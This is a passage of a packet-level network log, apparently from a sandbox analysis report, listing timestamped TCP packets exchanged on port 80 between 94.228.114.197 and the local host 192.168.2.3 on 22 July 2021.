Jul 22, 2021 11:28:05.623596907 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.623636007 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.623636961 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.623675108 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.623691082 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.623723984 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.623769045 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.623785019 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.623806953 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.623846054 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.623863935 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.623884916 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.623923063 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.623935938 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.623961926 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624000072 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624033928 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.624047995 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624090910 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624115944 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.624129057 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624166965 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624197006 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.624205112 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624248028 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624260902 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.624300003 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624341011 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624372005 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.624389887 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624433041 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624448061 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.624469995 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624507904 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624526024 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.624545097 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624581099 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624596119 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.624619961 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624655962 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624676943 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.624701977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624743938 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624763012 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.624783039 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624819994 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624833107 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.624857903 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624893904 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624906063 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.624931097 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624968052 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.624998093 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.625015020 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625057936 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625075102 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.625096083 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625134945 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625144005 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.625173092 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625207901 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625219107 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.625246048 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625282049 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625317097 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.625329018 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625370979 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625386953 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.625407934 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625446081 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625461102 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.625483990 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625519991 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625530958 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.625557899 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625596046 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625607967 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.625642061 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625684977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625693083 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.625732899 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625781059 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625799894 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.625822067 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625859022 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625869989 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.625896931 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625935078 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.625958920 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.625971079 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626008987 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626032114 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.626045942 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626094103 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.626094103 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626136065 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626172066 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626179934 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.626209974 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626247883 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626260996 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.626286030 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626324892 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626339912 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.626362085 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626408100 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.626409054 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626451015 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626488924 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626513004 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.626526117 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626564026 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626595974 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.626600981 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626638889 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626652002 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.626677036 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626723051 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626740932 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.626769066 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626806021 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626825094 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.626842976 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626883984 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626904011 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.626919985 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626956940 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.626969099 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.626995087 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.627041101 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.627058983 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.627156973 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.627201080 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.627221107 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.627248049 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.627249956 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.627289057 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.627300978 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.627335072 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.627377033 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.627388954 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.627414942 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.627456903 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.627475977 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.627494097 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.627530098 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.627542019 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.627568007 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.627605915 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.627614021 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.627651930 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.627692938 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.627712965 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.627729893 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.627770901 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.627790928 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.633342981 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.706765890 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.706828117 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.706883907 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.706924915 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.706932068 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.706963062 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.706975937 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.707011938 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.707072973 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.707138062 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.707144976 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.707204103 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.707206964 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.707247972 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.707300901 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.707307100 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.707365036 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.707421064 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.707425117 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.707483053 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.707540989 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.707559109 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.707596064 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.707652092 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.707684040 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.707704067 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.707762957 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.707767010 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.707830906 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.707887888 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.707891941 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.707940102 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.707990885 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.707993031 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.708050013 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.708105087 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.708105087 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.708172083 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.708228111 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.708229065 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.708282948 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.708338022 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.708338976 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.708394051 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.708446026 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.708457947 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.708518982 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.708570004 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.708576918 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.708609104 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.708646059 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.708659887 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.708683014 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.708722115 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.708725929 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.708817959 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.708859921 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.708950996 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.708985090 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709024906 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709105015 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709112883 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.709181070 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.709198952 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709250927 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709300041 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709341049 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709342003 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.709384918 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709387064 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.709423065 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709460020 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709467888 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.709498882 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709548950 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709561110 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.709594965 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709636927 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709673882 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709676027 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.709722042 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709738016 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.709762096 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709798098 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709836006 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709847927 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.709873915 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709877014 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.709909916 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709948063 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.709975004 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.709986925 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710031986 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.710033894 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710091114 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710124969 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710131884 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.710160971 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710195065 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710201979 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.710228920 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710263014 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710273981 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.710297108 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710339069 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710339069 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.710377932 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710411072 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710422039 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.710448027 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710481882 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710491896 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.710515022 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710544109 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.710550070 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710583925 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710593939 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.710625887 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710664988 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710686922 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.710700035 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710733891 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710738897 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.710769892 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710803032 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710813046 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.710838079 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710871935 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710881948 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.710913897 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710952044 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.710957050 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.710985899 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.711019993 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.711033106 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.711055040 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.711087942 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.711101055 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.711110115 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.711144924 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.711179972 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.711189985 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.711211920 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.711256027 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.711293936 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.711306095 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.711328983 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.711357117 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.711385012 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.711417913 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.711420059 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.711455107 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.711467028 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.711535931 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.711571932 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.711587906 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.711606026 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.711639881 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.711644888 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.711673975 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.711710930 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.712342024 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.712762117 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.714098930 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.792056084 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792098045 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792180061 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.792193890 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792258024 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792284966 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792308092 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792320967 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:05.792330027 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792351007 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792367935 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:05.792371988 CEST	49720	80	192.168.2.3	94.228.114.197
